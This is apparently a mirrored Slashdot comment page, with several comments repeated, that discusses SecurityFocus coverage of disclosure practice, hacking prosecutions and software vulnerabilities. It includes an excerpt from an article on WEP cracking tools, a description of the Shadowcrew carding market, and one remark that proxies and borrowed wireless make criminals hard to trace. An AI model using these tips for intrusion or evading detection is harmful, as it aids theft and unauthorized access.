Slashdot Mirror

What if someone discovers a security bug, and they are really responsible professional researchers, and they want to give all affected vendors some time to come up with an official solution? (researchers, not ppl into 0day exploits or cracking or whatever)
The way to do this is to have a multiple vendor coordinated release, where all agree on a date to release all together the alert and fix. This usually takes a few days, as most of them need to go through QA and other processes, as they are responsible to their customers.
SecurityFocus offers such a service for FREE to any researcher/vendor.

Blowing the whistle too early:
Even with that, there is always some a**hole or some idiot vendor breaking this blanket period. See how RH fsckd up this, many times, and got themselves up to the point of being told late. Some other linux groups also did this, by "mentioning" the bug to uncontrolled developers who went fixing on their own, thus blowing the whistle.

IF LINUS & CO LEAVE THIS COORDINATED SCHEMA, THEY'LL LOCK THEMSELVES OUT NOTIFICATIONS FROM RESPECTED RESEARCHERS.

NOTE1: i have nothing against the 0day or the cracking comunities, im only stating IF a researcher wants to give a blanket to vendors. (a very common case)
NOTE2: im not affiliated with SF, and even HATE the split bugtraq times for special vendors (i think this really killed it, a VV BAD move)
NOTE3: you might not agree with this schema, but consider most top name security firms follow it and it is to protect the users.
NOTE4: there is a defined period, so vendors are urged to come up with patch/alert
NOTE5: think also for the poor devs working for those vendors, making them work overnight hurried is not polite, they are devs like all of us
(im sure i miss some note and i'll get flamed anyway... flame on grrrrr)

What if someone discovers a security bug, and they are really responsible professional researchers, and they want to give all affected vendors some time to come up with an official solution? (researchers, not ppl into 0day exploits or cracking or whatever)
The way to do this is to have a multiple vendor coordinated release, where all agree on a date to release all together the alert and fix. This usually takes a few days, as most of them need to go through QA and other processes, as they are responsible to their customers.
SecurityFocus offers such a service for FREE to any researcher/vendor.

Blowing the whistle too early:
Even with that, there is always some a**hole or some idiot vendor breaking this blanket period. See how RH fsckd up this, many times, and got themselves up to the point of being told late. Some other linux groups also did this, by "mentioning" the bug to uncontrolled developers who went fixing on their own, thus blowing the whistle.

IF LINUS & CO LEAVE THIS COORDINATED SCHEMA, THEY'LL LOCK THEMSELVES OUT NOTIFICATIONS FROM RESPECTED RESEARCHERS.

NOTE1: i have nothing against the 0day or the cracking comunities, im only stating IF a researcher wants to give a blanket to vendors. (a very common case)
NOTE2: im not affiliated with SF, and even HATE the split bugtraq times for special vendors (i think this really killed it, a VV BAD move)
NOTE3: you might not agree with this schema, but consider most top name security firms follow it and it is to protect the users.
NOTE4: there is a defined period, so vendors are urged to come up with patch/alert
NOTE5: think also for the poor devs working for those vendors, making them work overnight hurried is not polite, they are devs like all of us
(im sure i miss some note and i'll get flamed anyway... flame on grrrrr)

When you find a bug like this, you should first and foremost submit it to the party responsible for the maintenance of the code. You should at least give the responsible party the opportunity to review/respond/repair before making vulnerabilities public knowledge.

Security exploits are a serious matter, and they need to be handled properly. Throwing this kind of thing out in the open willy-nilly is, at best, irresponsible.

You state that as fact, yet full disclosure is probably the most widely accepted way of dealing with exploits--and the most widely advocated by security experts.

It's at the very least a matter that's open to a lot of debate.

http://www.securityfocus.com/news/238

http://www.securityfocus.com/archive/77/216516

Applications: Microsoft Visual Studio, Microsoft Office Suite, Paint Shop Pro,
Corel Suite, Maya 2.5, FrontPage, Dreamweaver, Ultraweaver, Homesite, TopStyle,
Adobe (various), AutoCAD, AutoDesk Inventor, Filemaker Pro, Borland Programming
Suite, Flash, Poser, Internet Space Builder, Retina, Nscan, Nmap, Visual Route,
PGP, SATAN, SANTA, SAINT, L0phtcrack, Crack/John the Ripper/Derivatives, Iris, Notepad,
Ultra Edit, SoftIce, among others.

I better get working on my notepad skills if I need a job.

I disagree - if they (The Feds) were involved with other cases, which were exposed by this guy, they may have been waiting until they could shore up their defenses before allowing this to hit the news.
Once it's out there in the mainstream media, the world knows, and once the world knows, any international crime cases involved with the leaked information would have to be solid as a rock.

From the Article http://www.securityfocus.com/news/10271
"He'd obtained a log of an IRC chat session in which a hacker named "Myth" copy-and-pasted excerpts of an internal Secret Service memorandum report, and a Mutual Legal Assistance Treaty from the Russian Federation. Both documents are described in the Secret Service affidavit as "highly sensitive information pertaining to ongoing USSS criminal cases.""

Looking at this from the perspective of someone who was working inside the USSS cases, can you imagine what they had to contend with? There is more here than just some kid cracking a system for a few SSN's and cute pictures.

I agree, the most disturbing thing about all of this is the low level of knowledge of the hacker. He was nothing but a script kiddie on his resume and he was caught with obvious mistakes. We can be sure that TMobile and others are still owned by more sophisticated crackers who will not be caught.

The article links to a 2001 resume which never mentions GNU and only once mentions Unix but lots of Windozed based cracker toys and garbage. His efforts, while many, were too narrowly focused.

It does not look like he mastered Windoze cracking or much else by the time he was caught three years later. Besides being dumb enough to try to sell information, he accepted a proxy from a stranger. Someone who knew what they were doing would have a botnet proxy they set up themselves that could never be traced through. What else is windoze cracking good for?

The whole mindset was script kiddie. Own a phone service and collect stuff. What a waste of time.

He got his resume wish in a perverse way. He wanted a job is computer security. Now he's a felon and gets to spend some quality time as a government slave, snitching on his friends till he's all used up. Or he can go to jail and take the usual felon jobs: dishwasher, garbage man and other highly undesirable manual labor in tiny shops that know they can abuse you. Those jobs will be waiting for him when the government is through with him.

He's even posted to SecurityFocus' job postings back in 2001. Resume is as shown above, but sent via a Hotmail address.

Amazing.

Honeypot Proxy
By August 5th the agents already had a good idea what was going on, when Ethics made a fateful mistake. The hacker asked the Secret Service informant for a proxy server -- a host that would pass through Web connections, making them harder to trace. The informant was happy to oblige. The proxy he provided, of course, was a Secret Service machine specially configured for monitoring, and agents watched as the hacker surfed to "My T-Mobile," and entered a username and password belonging to Peter Cavicchia, a Secret Service cyber crime agent in New York.


Something doesn't quite ring right about this, apart from the obvious entrapment of the proxy. If his penetration of the T-Mobile system was as comprehensive as suggested, they why would the cracker he access the system via the public "My T-Mobile," ? It simply doesnt make sense unless he's simply picked it up as a lone username/password, and been socially engineered into using it.

The 'Hacker' also made little attempt or no serious attempt to cover his tracks, his IRC handle can be readly linked to his name, physical & email addresses and CV here, as disclosed by the artical.

The Mutual Legal Assistance Treaty with the Russian Federation. is apparently publicly available.

My guess is that Myth is really a handle for Peter Cavicchia, the ShadowCrew is and always has been a secret service entrapment operation for script kiddies and wannabes.

So... let's say that I want to patronize his obviously grossly illegal service. How do you consummate a transaction like this? Cash in a Fedex envelope? Sent to whom? A P.O. box?

Who performs first? Are there criminal escrow services?

This page, linked in the posted article, has some explanation about how they traded:

"The 4,000 Shadowcrew members were participants in an underground economy capable of providing a dizzying array of illicit products and services. The most active commodities were "dumps" of credit card account data, fake physical cards to go with the dumps ($50 blank, $70 embossed, in bulk), and expertly forged identification to help pass the plastic at the local consumer electronics store. Credit reports, hacked online bank accounts, and names, birthdates and social security numbers of potential identity theft targets were also for sale in bulk.

Each product had its own specialists, and every vendor had to be reviewed by a trusted site member before they were allowed to sell. Disputes were handled judiciously, "rippers" selling bunk products quickly exposed and banned from the site. In one case a vendor who owed another member money was allowed to continue selling only on the condition that his future illicit earnings would be garnished until his debt was repaid..

Members of the community even traded in tangible items like ATM skimmers, prescription drugs, and cocaine, and services like DDoS for hire and malware customization. One well-reviewed vendor offered a test-taking service that promised to get customers technical certifications within days. He was permitted to vend after earning the reviewer a Microsoft MCP certification under an alias."

And how stupid do you have to be to take out an ad online, in a known criminal hangout, announcing your secret power, and providing contact info?

Um, dude, have you ever hung out on undernet? All sorts of shady shit happens there. I've known friends who knew people from online chatrooms who hijacked business conference call lines and made them available to entire chatrooms as a group conference voicechat line. Warring chatrooms would even appear and try to make the line unusable. I thought it was moronic (they even called from their home and work phones for God's sake!), but I think people aren't used to the internet's topology. The lack of a physical police presence makes people pretty confident and reckless - you're not there, so they can't just arrest you on the spot, which eliminates most of the anxiety in any crime (smoke weed in a public park and your house and compare your reactions). Even worse, because of the nature of the internet, the police don't need a physical presence to monitor any of it, so criminals can't just look over and notice that shady van across the street. The lack of these real-world reminders makes for bad heuristic judgments. You'd think hackers would be the first to notice that their lack of fear is due to this sort of fallacy, but from the article, it's clear that some don't.

Don't get me wrong - I'm not saying that it's easy to catch people committing crimes online. It's extremely difficult. GHB kits thrived online, and I'm sure if you still looked you could find products ostensibly marketed for other reasons that are just clandestine GHB kits on google (that's the only example you get, but you'd all be fucking shocked if you knew just how many drugs are sold online with Visa and paypal). If you take only the most obvious precautions, it's many times harder. Something as simple as using a proxy and encryption from a "borrowed" wireless connection can make criminals almost undetectable. Many of us use one of the three reguarly. How hard is it to combine them?

The police can't monitor everything. Even if they devoted the resources to looking for this sort of thing, how many people know the magic combinations of words and searching techniques that let them

How? The same way those vaunted open-source developers managed to work widespread security flaws into TIFF images, PNG images, and even file names.

How? The same way those vaunted open-source developers managed to work widespread security flaws into TIFF images, PNG images, and even file names.

How? The same way those vaunted open-source developers managed to work widespread security flaws into TIFF images, PNG images, and even file names.

Seriously now. How the hell did they work that one in? Security flaws in Icon files.

Perhaps the same way as the widely-used and open source libpng library had a number of vulnerabilities last year? (ref 1, ref 2)

Or the same sort or way the Mozilla XBM vulnerability arose? (ref)

This isn't a new thing, and it's not unique to Microsoft, either.

Microsoft Security Bulletin MS05-001 addresses the cross-domain vulerability with their HTML Help Active-X control. Microsoft mentions that it's "newly" discovered, but see the proof-of-concept at Security Focus--posted into BugTraq almost a month ago.

Incidentally, if you're one of those rare Windows users running IE in restricted (ESC) mode, your vulnerability is mitigated... suprise, suprise.

http://www.securityfocus.com/bid/12186/discussion/ :

"Microsoft has released advanced notification that they will be releasing three security bulletins for Windows on January 11th, 2005. The vendor has not enumerated how many vulnerabilities will be addressed by these security bulletins, nor what specific components or platforms may be affected."

Microsoft itself has announced this as well: http://www.microsoft.com/technet/security/bulletin /advance.mspx/. No explicit details have been posted, obviously to prevent script kiddies from taking advantage of the vulnerabilities.

If you're concerned about the time for these vulnerabilities to be addressed, remember that the SMB vulnerability in Linux was not patched for over three months. Patches take time, particularly when faced with a huge user base (something Linux developers need not worry about) and a huge existing software base (again, something Linux developers need not worry about).

To be fair to Microsoft, their software picked up things on my PC which I knew were "dubious", but I knew were safe (e.g. Kazaa Lite as opposed to Kazaa, etc).

It's obvious that this software is aimed towards the uninformed masses in the same way SP2. I'd wager that most non-techie people barely know what spyware is, let alone how to find spyware-free "lite" versions of software, assuming they exist.

Also, the real time agent kicks serious ass. I'm amazed that people have even tried to criticise that (simply because its MS) by saying "oh great, yet another TSR program to run in the background, way to go M$!". When I installed the latest Sun JVM it informed me that a Browser Helper Object was installed and that it was "safe". A nice touch.

In other news, how come there hasn't been a front page story on these serious flaws in Mozilla and Firefox ? Double standards? I'm all for bashing MS when appropriate but lauding every single IE flaw with a seperate story and ignoring something like this doesn't exactly paint the site as unbiased.

From http://www.securityfocus.com/archive/1/386436:
first of all I must comply about the handling of this vulnerability that I reported to vendorsec. Obviously my code posted there has been stolen and plagiarized in order to put the blame on Stefan Esser from Ematters and disturb the security community. I really apologize to Stefan Esser for the inconvenience and thank him for his cool reaction - the plagiarism did work. Further steps must be taken to investigate the security leak on vendorsec.

Dude, Read, at least one linked article says that they are all fixed in the latest version.

Now it is actually still a problem with the download spoofing, but it is more of an annoyance. With the way the download manger parses urls, it is possible to misrepresent where something is being downloaded. If you can't trust the site then don't download. There will be "..." in the middle of the url for the file you are downloading so it is not like the url spoofs in IE. So you have a warning something may be fishy.

"Why is everyone saying these are fixed?" In the two links first, second is written, that they do not affect 1.7.5. Maybe because of that :-)

#9 is an oxymoron. How will expose one's own private into is going to protect ANYONE's privacy? Either people in EPIC are morons, or they are the biggest hypocrites working for telemarketers. What Do-Not-Call Registry really does is to tell telemarketers that these are actual marketing opportunities instead of some automated answering machines at the other side of the phone. As a result, telemarketers will call the suckers who sign up. And yes, the telemarketers will definitely get away with it, because they can just use caller I.D. spoofing services to shift blames, just like e-mail spammers have done for years.

"In many cases the response is we need to stick with the version that's available at the time that we purchased that distribution, so for example if I'm running Apache 1.3 on my Red Hat Enterprise server, although I may want Apache 2.0 because it might have new features or it might have some new capabilities, I'm outside of my support model now with Red Hat."

Is this a bad thing? Does Microsoft do something different? Can I get IIS6 supported on Windows 2000? Can I get Apache2 supported on Windows 2000?

"... if you take a look at Intertrust, the company that filed suit against Microsoft for patent infringement, Microsoft wrote a check for $440 million and our customers did not have to do anything in their implementation of Microsoft technology nor feel the pain, let's just say, of that situation."

If I used Microsoft software (That's a pretty big IF), would anything be different for me if Microsoft DIDN'T pay off Intertrust? Does Microsoft really think that if I don't violate a patent, I can be sued because they did?

"Obviously, Microsoft is incredibly focused on security."

Right... Obviously...

"In many cases the response is we need to stick with the version that's available at the time that we purchased that distribution, so for example if I'm running Apache 1.3 on my Red Hat Enterprise server, although I may want Apache 2.0 because it might have new features or it might have some new capabilities, I'm outside of my support model now with Red Hat."

Is this a bad thing? Does Microsoft do something different? Can I get IIS6 supported on Windows 2000? Can I get Apache2 supported on Windows 2000?

"... if you take a look at Intertrust, the company that filed suit against Microsoft for patent infringement, Microsoft wrote a check for $440 million and our customers did not have to do anything in their implementation of Microsoft technology nor feel the pain, let's just say, of that situation."

If I used Microsoft software (That's a pretty big IF), would anything be different for me if Microsoft DIDN'T pay off Intertrust? Does Microsoft really think that if I don't violate a patent, I can be sued because they did?

"Obviously, Microsoft is incredibly focused on security."

Right... Obviously...

Linux may be stable, virus-free, more secure by design

From http://www.securityfocus.com/bid/10662/discussion/ :

"It is reported that the Linux kernel version 2.6 contains a flaw which allows users to improperly change the group ownership on arbitrary files that they do not own. For the Linux kernel 2.4.X this issue is only exploitable when the kernel NFS server is active, for the 2.6.X kernel this issue is always exploitable.

An attacker may reportedly be able to exploit this issue to gain superuser privileges.

This issue was reported in version 2.6.6, but other versions, including 2.4.X, are also likely vulnerable."

SP2 is vulnerable to the winhlp32.exe Heap Overflow Vulnerability, according to xfocus. Buqtraq posting They dont know if LoadImage is vulnerable in SP2.

This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.

Is WEP that bad?

Many security folks and even more wireless folks these days are saying that WEP isn't all that bad. They say that if you use modern equipment that filters weak Initial Vectors (IVs) and change your keys frequently (or at least once in a while), nobody will ever crack your WEP. Sure, maybe some next-generation WEP attacks will arise one day that will change everything, but WEP is okay today for all but the most sensitive networks. Well, that next-generation is already here, heralded by highly functional tools that make WEP look weaker than Barney Fife on guard duty, sleeping on the job.

Let's take a look at some of the new tools that should be in every penetration tester's bag of tricks, rather then delving into the details of why the various attacks work. Time and time again, the industry has shown that it will not reject broken security safeguards until attacks are actually demonstrated in the real world. Here's how to quickly turn some heads.

The way things were

Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think.

The first caveat to this old approach is that only encrypted packets count. As wireless access points transmit unencrypted beacons several times per second, it is easy to be fooled into believing that you have a larger number of useful packets than you really do. If you use Kismet for network discovery and sniffing, it breaks down the packet count for you, displaying the number of "Crypted" packets separately from the total number, as shown below: Figure 1. Kismet in action.

The second thing working against your packet collection efforts is that only certain "interesting" or "weak" IVs are vulnerable to attack. Kismet also tells you how many of these have been gathered, although it may not use the same counting method as the various cracking tools. To make matters more difficult, wireless manufacturers responded to the FMS attack by filtering out the majority of weak IVs that their access points and wireless cards transmit. Unless your target network is using old equipment, chances are you'll have to collect no less than ten million encrypted packets to crack a WEP key using these older tools.

In early 2002, h1kari released a tool called dwepcrack (part of the bsd-airtools package) that improved upon the existing implementations of the FMS attack. Although dwepcrack did a good job of advancing the practical implementation of statistical WEP cryptanalysis, its improvements were only incremental.

Tools that changed everything

On August 8th, 2004, a hacker n

I'm not at all saying the cracker was right to break into NASA's systems. What I am saying is NASA has a responsibility to keep its systems secure, and spend the required $$$ to do so, and they failed. That they failed does not give them the right to charge that expense to the next person to walk through the door.

Download and install Linux

But then you still need to get all the patches for the 60 security vulnerabilities in the kernel this year (look it up: http://www.securityfocus.com/bid).

http://securityfocus.com/archive

You can't depend on Slashdot to keep you informed about security. For example, phpbbconfigdumper.c was published only hours after the actual PHP exploits were made public.

the first announcement was on wednesday by stefan esser on bugtraq and full-disclosure. additional info came up later on, PHP 4.3.10 changelist and the according changes in CVS can be seen by everyone since then.

i do not think that any serious system administraton team gets to know this vulnerabilities via slashdot for the first time, the problem is, that compilation of all dependencies and deployment to all systems is a hard job to do from wednesday night to a reasonable end just before weekend.... in a week where lots of companies have their *drinks all inclusive* xmas events and the usual pre-vacation problems occur.

No, you're not safe. Check this out. It is recent too, released on Dec 10, 2004.

This has been reported over a year ago. See the DOJ Press release...
DOJ Link for Salcedo here.

Also see the Security Focus article here.

There are plenty of articles about the case. The DOJ and FBI have most of it as public information for the search engine savy. The key is, there is a lot of potential damage to end consumers and the company with crimes like this. Considering it was his second offense and he hadn't even gotten off probation for the first, 9 years seems reasonable to me.

I have been following this case online for a while. They were involved with the 2600 scene, attented "Hacker" conventions, and were already known for things that some might view on a grey line (IE telephone companies - See Telcodata.us). The thing is that occasionally there are bad apples that learn from others and commit crimes. Showing a 9 year prison sentence might help keep some of the apples from rotting.

The 3rd guy, Adam Botbyl, used to live on the street behind mine. He's a couple years younger than me; my little brother knew him better than I did. (This article names him)

This was probably 10 years ago (him and my brother would have been in 5th or 6th grade), but one interesting bit of trivia is that he was the butt of jokes by the other kids. A bunch of the neighbor kids were into collecting basketball cards. Some of the crueler ones would put common cards back into the pack and glue the top together, and they'd sell or trade them to Adam.

As I heard about this through my brother, it was portrayed that Adam was hella gullible. One pack had a card from the wrong brand in it (e.g. a Topps card in an Upper Deck pack); the other kids told him that it must be some error and might be more valuable. Whether the kid actually believed it or just went along to avert more bullshit is a question for him.

Stories like this were pretty common, and I wonder what that does to a kid, having no good friends around.

Now, I'm not saying that's an excuse; he's a total stupidass for what he did.

I had read the SecurityFocus article (I never read the AP ones... cause they are always are sparse on details). I had thought it was the same linked article.

Who gets their news from a mickey mouse outfit like ABC anyway? If you're going to post some clueless banter about attempted credit card fraud, at least link to an article (or thread) with some relevant information about the case instead of an uninformed soundbite. You could start with one of the following:

http://reviews-zdnet.com.com/AnchorDesk/4520-7297_ 16-5511088.html

http://www.theregister.co.uk/2003/11/22/michigan_w ifi_hackers_try/

http://www.securityfocus.com/news/7438

http://www.securityfocus.com/news/8835

http://www.netstumbler.org/showthread.php?t=11115

Some of the more interesting quotes for those too lazy to click on the links:

"In 2000, as a juvenile, Salcedo was one of the first to be charged under Michigan's state computer crime law, for allegedly hacking a local ISP."

"It was six months later - Botbyl allegedly admitted to agents - that Botbyl and his friend Salcedo hatched a plan to use the network to steal credit card numbers from the hardware chain"

"At some point in their wardriving experience, Timmins and Botbyl came upon a Lowe's hardware store with an open wireless network. Timmins later admitted to Kevin Poulsen of Security Focus that what he did next was technically illegal: he used the Lowe's network to check his e-mail. When he realized it was Lowe's private network, however, he says, he disconnected."

"That in itself might have been the end of the story. However, Lowe's became aware of the breach and contacted the FBI, who, after its investigation, charged Timmins with one count of unauthorized computer access. And that by itself would have been a significant story: Timmins's plea has been reported as the first instance of a wardriving conviction. I think the claim is an exaggeration, however. The charge would have been the same had he used a wired connection."

"But here's where the story gets interesting. Several months later, Botbyl returned to the Southfield, Michigan, Lowe's with a new friend, Brian Salcedo, now 21. Salcedo, it turned out, was in the final weeks of a three-year probation for an earlier computer crime."

"According to the indictment, the hackers used the wireless network to route through Lowe's corporate data center in North Carolina and connect to the local networks at stores around the country. At two of the stores - in Long Beach, California and Gainseville, Florida - they modified a proprietary piece of software called "tcpcredit" that Lowe's uses to process credit card transactions, building in a virtual wiretap that would store customer's credit card numbers where the hackers could retrieve them later."

"Brian Salcedo, 21, faces an a unusually harsh 12 to 15 year prison term under federal sentencing guidelines, based largely on a stipulation that the potential losses in the scheme exceeded $2.5 million."

"As for how it was computed here's one probable way: Maximum number of cards in the system at the time they could have captured, multiplied times the maximum credit limit on each. (So say Lowe's does an average of 2500 credit cards transactions nationally in a night, and each has a $1000 Credit Limit. That is $2,500,000 right there.)"

"They were not able to access nationwide credit card files or get into corporate systems," says Lowe's spokesperson Gina Balaya. "They did access six credit card transactions from one store."

"My initial reaction when I heard the charges was one of skepticism," says Karl Mozurkewich, founder of the Michigan software company Utropicmedia, and a member of the group. "Eighty percent of the people in the 2600 group in Michigan are more the c

Who gets their news from a mickey mouse outfit like ABC anyway? If you're going to post some clueless banter about attempted credit card fraud, at least link to an article (or thread) with some relevant information about the case instead of an uninformed soundbite. You could start with one of the following:

http://reviews-zdnet.com.com/AnchorDesk/4520-7297_ 16-5511088.html

http://www.theregister.co.uk/2003/11/22/michigan_w ifi_hackers_try/

http://www.securityfocus.com/news/7438

http://www.securityfocus.com/news/8835

http://www.netstumbler.org/showthread.php?t=11115

Some of the more interesting quotes for those too lazy to click on the links:

"In 2000, as a juvenile, Salcedo was one of the first to be charged under Michigan's state computer crime law, for allegedly hacking a local ISP."

"It was six months later - Botbyl allegedly admitted to agents - that Botbyl and his friend Salcedo hatched a plan to use the network to steal credit card numbers from the hardware chain"

"At some point in their wardriving experience, Timmins and Botbyl came upon a Lowe's hardware store with an open wireless network. Timmins later admitted to Kevin Poulsen of Security Focus that what he did next was technically illegal: he used the Lowe's network to check his e-mail. When he realized it was Lowe's private network, however, he says, he disconnected."

"That in itself might have been the end of the story. However, Lowe's became aware of the breach and contacted the FBI, who, after its investigation, charged Timmins with one count of unauthorized computer access. And that by itself would have been a significant story: Timmins's plea has been reported as the first instance of a wardriving conviction. I think the claim is an exaggeration, however. The charge would have been the same had he used a wired connection."

"But here's where the story gets interesting. Several months later, Botbyl returned to the Southfield, Michigan, Lowe's with a new friend, Brian Salcedo, now 21. Salcedo, it turned out, was in the final weeks of a three-year probation for an earlier computer crime."

"According to the indictment, the hackers used the wireless network to route through Lowe's corporate data center in North Carolina and connect to the local networks at stores around the country. At two of the stores - in Long Beach, California and Gainseville, Florida - they modified a proprietary piece of software called "tcpcredit" that Lowe's uses to process credit card transactions, building in a virtual wiretap that would store customer's credit card numbers where the hackers could retrieve them later."

"Brian Salcedo, 21, faces an a unusually harsh 12 to 15 year prison term under federal sentencing guidelines, based largely on a stipulation that the potential losses in the scheme exceeded $2.5 million."

"As for how it was computed here's one probable way: Maximum number of cards in the system at the time they could have captured, multiplied times the maximum credit limit on each. (So say Lowe's does an average of 2500 credit cards transactions nationally in a night, and each has a $1000 Credit Limit. That is $2,500,000 right there.)"

"They were not able to access nationwide credit card files or get into corporate systems," says Lowe's spokesperson Gina Balaya. "They did access six credit card transactions from one store."

"My initial reaction when I heard the charges was one of skepticism," says Karl Mozurkewich, founder of the Michigan software company Utropicmedia, and a member of the group. "Eighty percent of the people in the 2600 group in Michigan are more the c

Interestingly, the article linked above also mentions other cases of internet restrictions imposed by judges during sentencing.

With credit for time served and good behavior, Salcedo will be eligible for release in the fall of 2011.

Even reduced, Salcedo's prison term is unusually harsh for a computer crime. The sentence is based largely on a stipulation in Salcedo's plea agreement with prosecutors that the losses in the abortive caper would have exceeded $2.5 million. "The damage that Mr. Salcedo could have caused the consumers if he was successful could have been astounding," says prosecutor Martens.

Salcedo's defense attorney, Samuel Winthrop, did not return phone calls.

No, it's not: http://www.securityfocus.com/bid/11864/.

http://www.securityfocus.com/bid/11864/info/, along with the other 59 other Linux Kernel security vulnerabilities reported this year seem to indicate otherwise. Check out http://www.securityfocus.com/ and choose Linux as the vendor.

http://www.securityfocus.com/bid/11864/info/, along with the other 59 other Linux Kernel security vulnerabilities reported this year seem to indicate otherwise. Check out http://www.securityfocus.com/ and choose Linux as the vendor.

Minor Threat along with Mucho Maas authored ToneLoc, a great war dialer. Hours upon hours I sat, watched, and listened while it scanned. Great Stuff..

Somebody already did that. IE passed, no other browser did. Although I think the firefox people got working on the bugs it showed up pretty quickly, and the only reason IE passed was because MS has recently incorporated this testing into their standard setup.

Note that the "Some not" article link (where the author desribes vulnerabilities that have not been patched for IE) describes the popup injection attack as being IE-specific, even though both http://www.securityfocus.com/bid and http://www.secunia.com/ have reported this vulnerability for *all* browsers. This blatant misrepresentation of facts decreases the credibility of the author significantly.

Actually, just last month, Michal Zalewski ran a trivial HTML monkey attack against most of the browsers out there. IE didn't have any problem with it, but he found many probably exploitable issues with all of the others.

Which doesn't change the fact that needless javascript is bad. It is.

The security focus mailing list dedicated to forensics is also good lurking

I am the moderator of the SecurityFocus.com forensics list, and agree that it is a great resource. (Al Huger is listed in the info page as the moderator; he is actually the list owner.) The list is dedicated to discussion of technical forensics topics.

The SF forensics list archives are here. A general listing of SF mailing list archives is here. Those interested in subscribing to the forensics list (or other lists @SecurityFocus) can do so from the archive page.

Cheers!

Scott C. Zimmerman, CISSP

The security focus mailing list dedicated to forensics is also good lurking

I am the moderator of the SecurityFocus.com forensics list, and agree that it is a great resource. (Al Huger is listed in the info page as the moderator; he is actually the list owner.) The list is dedicated to discussion of technical forensics topics.

The SF forensics list archives are here. A general listing of SF mailing list archives is here. Those interested in subscribing to the forensics list (or other lists @SecurityFocus) can do so from the archive page.

Cheers!

Scott C. Zimmerman, CISSP

Most interesting is the clear market distinction that is being drawn between spyware and virus. We've seen the technical argument about how they cannot be categorized the same, but I figured that these markets would have fully merged by now.

That's not what the term DDoS means. It means you make the service unavailable by inundating the server (or a critical intermediate point) with requests[...] Your stretched definition is not only wrong, but is also a blatent attempt to change the meaning of a term for expediency.

No, you are the one who is wrong. What you describe is a network-based* denial of service attack. There are other types, too. Just because network-based attacks are the most common today, doesn't mean the meaning of DoS has changed. Read any advisory on bugs that makes Apache crash for good, and you'll find the term DoS in a context you just excluded. And the other D just means that the attack is staged from a multitude of computers (and usually implies that it would be hard to do from only one). One definition I found was:

"An attack on a computer system intended to reduce, or entirely block, the level of service that 'legitimate clients' can receive from that system."

And SecurityFocus describes it as

"The term can be applied to any situation where an attacker attempts to prevent the use or delivery of a valued resource to its intended audience or customer. It can be implemented via multiple methods, physically and digitally."

So while the attack doesn't fit into one of the existing categories for DoS attacks, it fits the "denial" part well: they attack the cost of the network (the fact that the spammers themselves will have to pull the plug before the cost explodes IMHO doesn't change that character: there are other DoS attacks out there which effectively work by indirectly forcing the admin to take the machine down herself.)



*network-based in this context doesn't mean "anything coming over a network" here, but "concentrating on denying the network-component of the target system".

security focus has a piece on this too.